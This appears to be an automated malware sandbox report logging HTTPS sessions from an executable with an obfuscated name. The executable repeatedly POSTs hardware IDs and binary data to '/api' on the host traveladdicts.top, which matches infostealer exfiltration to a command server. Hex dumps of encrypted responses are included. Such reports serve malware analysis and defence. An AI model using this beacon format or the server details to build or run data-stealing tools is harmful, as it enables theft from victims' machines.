                                                                                                                                                2025-01-28 15:12:36 UTC236INData Raw: 31 63 63 30 0d 0a 44 49 68 31 34 61 32 31 53 55 4f 69 74 62 79 79 43 73 54 45 46 74 75 4a 54 41 30 68 2f 2b 42 79 53 69 64 62 51 75 6f 4e 42 4e 4a 33 71 67 50 44 6c 34 46 6c 59 64 48 51 6e 6f 68 2b 74 72 46 7a 39 36 73 74 61 51 50 46 68 68 4d 6d 56 44 35 75 79 48 74 70 38 44 62 75 46 49 33 65 30 47 56 68 78 38 32 65 69 46 47 2f 35 6e 4f 31 71 33 59 76 52 4a 57 43 45 79 5a 46 4f 69 6d 46 66 57 69 78 5a 4f 51 53 69 63 6a 57 4c 53 4c 4f 32 4e 6e 58 62 36 57 75 65 4c 4c 6b 4a 47 41 44 30 38 49 58 4d 41 56 68 59 4b 64 6f 63 4c 4e 42 36 51 61 4b 6a 38 68 6c 4f 49 44 51 30 70 41 77 35 71 56 7a 75 65 55 71 61 55 71 58 69 42 6f 75 52 44 38 6f 6d 6d 52 69 75 6d 54 71 45 59 6a 43 33 7a 6b 76 78 4e 2f 53 30 57
                                                                                                                                                Data Ascii: 1cc0DIh14a21SUOitbyyCsTEFtuJTA0h/+BySidbQuoNBNJ3qgPDl4FlYdHQnoh+trFz96staQPFhhMmVD5uyHtp8DbuFI3e0GVhx82eiFG/5nO1q3YvRJWCEyZFOimFfWixZOQSicjWLSLO2NnXb6WueLLkJGAD08IXMAVhYKdocLNB6QaKj8hlOIDQ0pAw5qVzueUqaUqXiBouRD8ommRiumTqEYjC3zkvxN/S0W
                                                                                                                                                2025-01-28 15:12:36 UTC1369INData Raw: 57 6c 35 6a 72 35 37 44 59 76 47 39 33 52 49 69 74 55 4b 44 57 46 66 32 44 77 63 61 51 4f 77 38 6a 62 61 33 6d 41 33 39 4c 65 62 61 57 70 63 37 6a 72 50 47 42 44 6e 6f 6f 59 4c 45 38 32 4c 34 64 68 62 4c 64 6d 34 78 43 4d 79 4e 38 74 4c 73 4f 58 6b 4a 42 76 76 75 59 73 2b 63 73 2b 62 45 43 4a 6a 77 46 6f 57 6e 63 35 79 47 68 71 38 44 61 71 45 59 33 4f 32 69 73 7a 79 4e 7a 56 31 58 71 74 72 33 6d 30 36 79 4e 6c 54 4a 36 43 46 79 4a 50 4e 69 71 4d 59 6d 75 32 62 75 70 58 7a 59 2f 51 4d 32 47 59 6c 2f 33 56 65 4b 47 71 59 76 76 52 62 6e 41 4e 68 4d 49 58 4a 41 56 68 59 49 42 71 5a 62 4e 6c 35 52 53 4c 78 4d 55 72 4d 38 62 61 32 38 4a 75 6f 36 68 2b 75 76 6b 6b 59 55 57 65 69 78 73 68 51 44 34 6b 79 43 45 6d 74 33 61 71 54 38 50 75 32 69 41 74 79 73 44 65 6b
                                                                                                                                                Data Ascii: Wl5jr57DYvG93RIitUKDWFf2DwcaQOw8jba3mA39LebaWpc7jrPGBDnooYLE82L4dhbLdm4xCMyN8tLsOXkJBvvuYs+cs+bECJjwFoWnc5yGhq8DaqEY3O2iszyNzV1Xqtr3m06yNlTJ6CFyJPNiqMYmu2bupXzY/QM2GYl/3VeKGqYvvRbnANhMIXJAVhYIBqZbNl5RSLxMUrM8ba28Juo6h+uvkkYUWeixshQD4kyCEmt3aqT8Pu2iAtysDek
                                                                                                                                                2025-01-28 15:12:36 UTC1369INData Raw: 30 74 66 6b 69 5a 55 57 53 6a 78 78 6f 43 33 6b 6e 6b 43 38 2b 38 45 54 70 41 34 44 46 6c 52 34 69 7a 74 6e 5a 78 69 69 35 36 47 33 35 37 43 49 76 47 39 32 50 45 53 42 44 4b 79 2b 46 62 47 69 2b 59 65 38 59 69 38 2f 58 4a 69 54 45 33 4e 58 54 5a 61 4b 30 66 72 6e 6a 4b 32 35 4a 6c 38 4a 65 61 45 49 68 59 4e 41 76 56 36 64 6c 71 43 4b 41 77 64 6b 73 4e 34 44 49 6b 4d 6b 6f 6f 61 6f 30 34 61 73 6a 5a 30 61 59 6a 52 45 69 53 7a 77 71 68 47 64 6f 73 33 7a 6c 45 34 50 44 33 79 45 73 7a 74 50 57 32 57 4f 74 6f 48 53 34 34 57 34 68 41 35 71 61 55 48 41 46 44 53 65 45 59 6d 6e 79 57 2b 6b 5a 6a 63 6a 42 61 7a 36 4f 7a 70 37 58 5a 4f 62 2b 4e 4c 58 69 4c 6d 52 4a 6d 59 49 58 4a 55 41 36 4a 34 74 69 59 62 70 67 37 52 4f 50 78 74 6f 74 49 63 66 54 32 38 4a 74 72 36
                                                                                                                                                Data Ascii: 0tfkiZUWSjxxoC3knkC8+8ETpA4DFlR4iztnZxii56G357CIvG92PESBDKy+FbGi+Ye8Yi8/XJiTE3NXTZaK0frnjK25Jl8JeaEIhYNAvV6dlqCKAwdksN4DIkMkooao04asjZ0aYjREiSzwqhGdos3zlE4PD3yEsztPW2WOtoHS44W4hA5qaUHAFDSeEYmnyW+kZjcjBaz6Ozp7XZOb+NLXiLmRJmYIXJUA6J4tiYbpg7ROPxtotIcfT28Jtr6
                                                                                                                                                2025-01-28 15:12:36 UTC1369INData Raw: 49 48 6b 44 67 73 77 4a 61 45 49 31 59 4e 41 76 62 37 6c 38 35 42 6d 4b 77 74 45 6a 4a 73 37 61 31 64 5a 6a 6f 61 46 79 74 4f 4d 6a 61 6b 43 63 68 68 6f 36 52 6a 49 71 68 57 55 6d 2f 69 37 74 44 38 4f 58 6c 77 77 74 36 63 66 46 77 6e 37 6d 75 54 71 67 71 79 6c 6a 41 38 58 43 45 79 64 4d 4e 69 69 41 59 47 6d 30 59 4f 77 52 6a 73 72 59 49 54 50 49 32 64 50 62 5a 36 32 30 64 4c 54 76 49 6d 74 4c 6c 6f 68 51 5a 67 55 2b 4f 4d 67 33 4a 6f 56 6a 35 52 65 41 32 5a 63 30 62 39 6d 58 32 64 77 6f 2f 75 5a 34 74 2b 73 68 59 30 2b 57 69 68 45 6b 53 7a 34 6c 67 57 64 75 6f 6d 2f 75 48 34 4c 42 32 43 6f 6c 78 64 4c 61 31 32 79 67 71 54 54 33 71 79 6c 33 41 38 58 43 50 77 39 77 65 77 47 79 4c 33 6e 2b 64 36 6f 51 6a 34 2b 50 61 79 33 44 32 39 62 66 62 71 2b 71 66 72 44
                                                                                                                                                Data Ascii: IHkDgswJaEI1YNAvb7l85BmKwtEjJs7a1dZjoaFytOMjakCchho6RjIqhWUm/i7tD8OXlwwt6cfFwn7muTqgqyljA8XCEydMNiiAYGm0YOwRjsrYITPI2dPbZ620dLTvImtLlohQZgU+OMg3JoVj5ReA2Zc0b9mX2dwo/uZ4t+shY0+WihEkSz4lgWduom/uH4LB2ColxdLa12ygqTT3qyl3A8XCPw9wewGyL3n+d6oQj4+Pay3D29bfbq+qfrD
                                                                                                                                                2025-01-28 15:12:36 UTC1369INData Raw: 4a 6d 42 46 43 31 4b 4f 43 47 4f 66 57 47 35 66 4f 51 61 6a 4d 66 66 49 69 44 45 30 74 50 57 5a 4b 79 6e 63 37 66 6c 4a 69 38 4e 33 59 55 49 61 42 31 35 41 5a 68 30 64 4b 5a 6a 79 78 71 4d 6a 38 68 6c 4f 49 44 51 30 70 41 77 35 71 39 6d 76 65 59 38 5a 6b 53 54 6a 52 4d 36 52 44 51 72 6d 6d 68 70 74 47 6e 6d 45 59 7a 4a 31 69 34 72 7a 4e 44 62 32 32 65 71 35 6a 72 35 37 44 59 76 47 39 32 73 47 7a 74 53 4f 69 36 44 65 58 33 77 63 61 51 4f 77 38 6a 62 61 33 6d 41 31 4e 58 62 62 4b 61 71 64 4c 33 6d 4c 6e 31 4d 6d 6f 55 5a 49 31 63 7a 4a 34 39 6b 62 72 74 68 37 41 57 50 77 63 55 75 4d 39 4b 58 6b 4a 42 76 76 75 59 73 2b 64 30 70 66 31 4f 65 77 43 45 2b 52 69 38 72 68 57 4d 6d 72 79 44 7a 56 34 54 44 6c 33 4e 68 78 74 6a 58 30 32 65 6e 72 33 69 30 37 69 64 71
                                                                                                                                                Data Ascii: JmBFC1KOCGOfWG5fOQajMffIiDE0tPWZKync7flJi8N3YUIaB15AZh0dKZjyxqMj8hlOIDQ0pAw5q9mveY8ZkSTjRM6RDQrmmhptGnmEYzJ1i4rzNDb22eq5jr57DYvG92sGztSOi6DeX3wcaQOw8jba3mA1NXbbKaqdL3mLn1MmoUZI1czJ49kbrth7AWPwcUuM9KXkJBvvuYs+d0pf1OewCE+Ri8rhWMmryDzV4TDl3NhxtjX02enr3i07idq
                                                                                                                                                2025-01-28 15:12:36 UTC1369INData Raw: 73 6d 64 7a 6f 37 79 48 41 6f 71 53 37 74 47 38 4f 58 6c 79 67 6d 77 39 62 55 32 57 53 70 6f 58 43 72 34 53 6c 39 51 70 79 4a 48 53 52 46 4e 43 32 43 62 6d 2b 39 59 75 63 51 68 4d 44 53 61 32 2b 41 30 4d 61 51 4d 4f 61 48 65 62 4c 6e 64 54 55 44 67 73 77 4a 61 45 49 31 59 4e 41 76 5a 72 70 72 34 42 71 41 77 4e 51 35 49 4d 62 46 33 74 31 69 74 4b 78 2f 76 4f 59 6a 59 6b 43 62 68 42 73 6b 56 7a 41 67 69 32 51 6d 2f 69 37 74 44 38 4f 58 6c 77 67 32 31 74 33 5a 33 48 36 74 70 33 65 76 35 6a 34 76 44 64 32 54 46 7a 6b 46 59 54 61 59 65 47 47 76 49 50 4e 58 68 4d 4f 58 63 32 48 47 33 74 6a 58 62 71 69 30 63 62 2f 6b 49 57 5a 4b 6d 59 6f 54 4b 45 45 39 4a 34 31 73 61 72 74 70 36 52 69 48 78 74 6b 69 4c 6f 43 5a 6e 74 64 77 35 76 34 30 6d 50 41 74 59 30 37 64 6e
                                                                                                                                                Data Ascii: smdzo7yHAoqS7tG8OXlygmw9bU2WSpoXCr4Sl9QpyJHSRFNC2Cbm+9YucQhMDSa2+A0MaQMOaHebLndTUDgswJaEI1YNAvZrpr4BqAwNQ5IMbF3t1itKx/vOYjYkCbhBskVzAgi2Qm/i7tD8OXlwg21t3Z3H6tp3ev5j4vDd2TFzkFYTaYeGGvIPNXhMOXc2HG3tjXbqi0cb/kIWZKmYoTKEE9J41sartp6RiHxtkiLoCZntdw5v40mPAtY07dn
                                                                                                                                                2025-01-28 15:12:36 UTC287INData Raw: 35 62 73 68 6f 66 76 41 32 71 6a 65 49 32 64 49 73 4e 34 4c 69 33 64 35 6d 6f 62 41 30 70 74 52 67 4c 30 79 48 77 6b 67 52 58 48 6b 6e 68 43 38 2b 38 48 76 74 46 34 54 56 77 53 77 74 30 64 7a 54 33 45 71 70 6f 57 4b 36 35 43 31 2b 53 74 47 4a 48 57 67 4c 65 53 65 51 4c 7a 37 77 51 65 30 42 67 4f 44 55 4f 69 69 41 6d 5a 37 58 66 75 62 2b 4e 49 65 72 50 47 78 54 6e 6f 30 42 46 67 56 68 4f 62 59 76 62 61 5a 70 2b 68 53 56 78 4e 6f 6e 4d 50 36 58 68 6f 51 36 39 50 51 6d 36 2f 52 75 63 48 7a 54 77 68 46 6f 48 51 41 35 79 48 6b 6d 36 44 79 6b 56 35 47 50 6a 32 74 6d 77 38 58 4d 31 6d 75 77 70 54 4f 48 31 51 6c 35 53 5a 71 53 46 7a 39 4b 65 57 37 49 59 43 62 6f 56 36 6f 65 68 4e 54 47 50 53 7a 51 30 4a 37 76 4a 75 61 2b 4e 4f 47 72 47 32 78 4e 6b 34 55 47 4f 51
                                                                                                                                                Data Ascii: 5bshofvA2qjeI2dIsN4Li3d5mobA0ptRgL0yHwkgRXHknhC8+8HvtF4TVwSwt0dzT3EqpoWK65C1+StGJHWgLeSeQLz7wQe0BgODUOiiAmZ7Xfub+NIerPGxTno0BFgVhObYvbaZp+hSVxNonMP6XhoQ69PQm6/RucHzTwhFoHQA5yHkm6DykV5GPj2tmw8XM1muwpTOH1Ql5SZqSFz9KeW7IYCboV6oehNTGPSzQ0J7vJua+NOGrG2xNk4UGOQ
                                                                                                                                                2025-01-28 15:12:36 UTC1369INData Raw: 32 63 64 34 0d 0a 36 37 42 37 50 42 54 4e 30 41 39 6d 58 48 6b 32 79 44 63 30 2f 69 37 34 56 39 75 50 6b 43 67 7a 30 74 48 64 78 6d 76 68 6d 45 71 65 38 53 4e 70 56 49 79 38 4c 69 39 66 4e 43 61 66 66 69 71 6c 62 65 51 5a 68 4e 6d 58 5a 57 48 50 6c 34 62 70 4b 4f 37 6d 53 2f 65 72 4e 69 38 62 33 62 63 54 4a 6b 73 2b 4e 70 6b 69 51 61 70 6a 37 41 43 53 6a 35 6c 72 4a 34 43 50 6a 4a 34 6f 6f 72 63 30 34 62 74 38 4e 42 62 4f 31 55 42 36 57 6e 63 35 79 48 6b 6d 36 44 79 6b 56 35 47 50 6a 32 74 6d 77 38 58 4d 31 6d 75 77 70 54 4f 48 31 51 42 6f 52 5a 69 46 41 47 70 72 4d 6a 53 50 4c 79 6a 77 59 61 70 50 75 6f 2b 66 61 78 36 4f 6c 38 61 51 4d 4f 61 54 64 37 66 6c 4b 58 6c 53 30 4b 77 58 4c 6b 41 2b 4d 4d 70 42 62 61 52 70 71 6c 6e 44 79 5a 64 7a 63 59 36 58 32
                                                                                                                                                Data Ascii: 2cd467B7PBTN0A9mXHk2yDc0/i74V9uPkCgz0tHdxmvhmEqe8SNpVIy8Li9fNCaffiqlbeQZhNmXZWHPl4bpKO7mS/erNi8b3bcTJks+NpkiQapj7ACSj5lrJ4CPjJ4oorc04bt8NBbO1UB6Wnc5yHkm6DykV5GPj2tmw8XM1muwpTOH1QBoRZiFAGprMjSPLyjwYapPuo+fax6Ol8aQMOaTd7flKXlS0KwXLkA+MMpBbaRpqlnDyZdzcY6X2
                                                                                                                                                2025-01-28 15:12:36 UTC1369INData Raw: 6f 63 37 6a 39 50 6e 68 4d 6f 37 77 46 4b 30 73 33 4a 35 35 2b 4a 76 34 75 35 56 66 62 39 70 64 6a 59 66 2b 5a 6e 73 67 6f 2f 75 5a 42 75 75 55 67 61 46 57 4d 7a 7a 63 6d 51 6a 67 32 6d 48 68 70 38 43 43 71 45 63 4f 58 68 57 56 68 78 4d 61 65 69 44 6a 30 2f 53 48 71 76 48 34 39 58 4e 4f 62 55 44 34 46 59 58 4c 47 4c 33 54 77 4e 71 70 51 67 4e 33 46 4c 53 4c 57 31 4a 6e 75 56 6f 47 6f 63 37 6a 39 50 6e 68 4d 30 71 77 6d 43 58 73 48 4e 59 74 68 61 4c 64 34 2b 31 66 4e 6a 39 68 72 65 66 6d 58 6c 70 42 58 36 4f 5a 73 2b 62 4e 75 57 6b 43 54 6a 42 63 2b 56 48 51 48 68 6d 68 6e 70 6e 37 39 47 4d 7a 68 34 51 70 68 6a 70 66 59 6b 44 44 30 36 44 53 39 2b 6d 34 33 45 38 2f 5a 52 58 73 53 61 58 4b 58 49 58 2f 77 65 4b 70 50 30 59 47 58 4f 57 47 59 6c 35 6e 54 65 72
                                                                                                                                                Data Ascii: oc7j9PnhMo7wFK0s3J55+Jv4u5Vfb9pdjYf+Znsgo/uZBuuUgaFWMzzcmQjg2mHhp8CCqEcOXhWVhxMaeiDj0/SHqvH49XNObUD4FYXLGL3TwNqpQgN3FLSLW1JnuVoGoc7j9PnhM0qwmCXsHNYthaLd4+1fNj9hrefmXlpBX6OZs+bNuWkCTjBc+VHQHhmhnpn79GMzh4QphjpfYkDD06DS9+m43E8/ZRXsSaXKXIX/weKpP0YGXOWGYl5nTer


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.949891172.67.202.1414437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:12:37 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=4R91O26XP53ONV79
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 12835
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:12:37 UTC12835OUTData Raw: 2d 2d 34 52 39 31 4f 32 36 58 50 35 33 4f 4e 56 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 34 52 39 31 4f 32 36 58 50 35 33 4f 4e 56 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 52 39 31 4f 32 36 58 50 35 33 4f 4e 56 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d
                                                                                                                                                Data Ascii: --4R91O26XP53ONV79Content-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--4R91O26XP53ONV79Content-Disposition: form-data; name="pid"2--4R91O26XP53ONV79Content-Disposition: form-data; name="lid"MeHdy4--pl2yan1--
                                                                                                                                                2025-01-28 15:12:49 UTC1140INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:12:49 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=t7smeis1e15g8btugg61s11n1n; expires=Sat, 24 May 2025 08:59:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMuuqFMC18bJPW04h5xk%2BsEvmv6fn2P39cRo00MBc%2FaVLB%2BnWP7Ta3AG%2BJ5NtcYjSsYNEYxclG8qh%2BP8BOctSmxot9F3s2pOWrqwkkjgMX7ClxuX9Yo5Pz6fYoUTSfWz%2BV01XQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ebf85bd042d7-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1575&rtt_var=625&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13774&delivery_rate=1703617&cwnd=246&unsent_bytes=0&cid=7c82b271dc9a645b&ts=12159&x=0"
                                                                                                                                                2025-01-28 15:12:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2025-01-28 15:12:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.949224172.67.202.1414437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:12:49 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=6TPX6EWWU8QLG
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 15035
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:12:49 UTC15035OUTData Raw: 2d 2d 36 54 50 58 36 45 57 57 55 38 51 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 36 54 50 58 36 45 57 57 55 38 51 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 54 50 58 36 45 57 57 55 38 51 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d 36 54 50 58 36 45 57 57 55
                                                                                                                                                Data Ascii: --6TPX6EWWU8QLGContent-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--6TPX6EWWU8QLGContent-Disposition: form-data; name="pid"2--6TPX6EWWU8QLGContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--6TPX6EWWU
                                                                                                                                                2025-01-28 15:13:01 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:01 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=oq6f614kg1k0eltc100k5j39sg; expires=Sat, 24 May 2025 08:59:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BmeAnuwbvSBOHR3ScGOIFiooJ7CEUAVekDDVTM5pK2pT8WbgIdrAKn7iFcfCjmQXpamyv6Ap11DVEfZu0UNTaGnHiKy4PEqMPtRjZ9EeZq6NAew29cEOi4N8BIUOwNqHx5anQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ec48ce39333c-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1996&rtt_var=750&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2842&recv_bytes=15971&delivery_rate=1457085&cwnd=32&unsent_bytes=0&cid=f388171507508da0&ts=12009&x=0"
                                                                                                                                                2025-01-28 15:13:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2025-01-28 15:13:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.949233172.67.202.1414437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:13:02 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=ENY5G9P6AN86O47W
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 20569
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:13:02 UTC15331OUTData Raw: 2d 2d 45 4e 59 35 47 39 50 36 41 4e 38 36 4f 34 37 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 45 4e 59 35 47 39 50 36 41 4e 38 36 4f 34 37 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 4e 59 35 47 39 50 36 41 4e 38 36 4f 34 37 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d
                                                                                                                                                Data Ascii: --ENY5G9P6AN86O47WContent-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--ENY5G9P6AN86O47WContent-Disposition: form-data; name="pid"3--ENY5G9P6AN86O47WContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--
                                                                                                                                                2025-01-28 15:13:02 UTC5238OUTData Raw: 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: |lQJ$nInVZ+?:us}Q0u?4E([:s~
                                                                                                                                                2025-01-28 15:13:04 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:04 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=l538tq8f8kg94ejhknl7shva52; expires=Sat, 24 May 2025 08:59:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lhLsG1jj6kE6nudD1sJIrAINrweZKgaHL8SmxXi7xGFzdeQ1U4QiB1M7lkbgDPktCWGiuFh8%2FbqAIVYaqyIaejOEP8IlxDlrZLgLRVrKfwCvx%2BSsgGrsgz087W%2FgtAx2qREszw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ec99d9387c8e-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
